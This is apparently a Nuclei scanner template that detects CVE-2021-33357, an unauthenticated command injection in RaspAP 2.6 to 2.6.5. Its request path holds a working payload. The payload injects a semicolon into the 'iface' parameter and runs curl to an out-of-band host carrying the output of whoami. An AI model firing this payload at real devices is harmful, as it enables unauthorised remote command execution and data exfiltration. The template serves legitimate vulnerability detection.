id: CVE-2021-33357 info: name: RaspAP <=2.6.5 - Remote Command Injection author: pikpikcu,pdteam severity: critical description: | RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";". reference: - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/ - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf - https://github.com/RaspAP/raspap-webgui - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33357 cwe-id: CWE-78 tags: cve,cve2021,rce,raspap,oast requests: - method: GET path: - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;" matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word words: - "DHCPEnabled" extractors: - type: regex part: interactsh_request group: 1 regex: - 'GET \/([a-z-]+) HTTP' # Enhanced by mp on 2022/05/18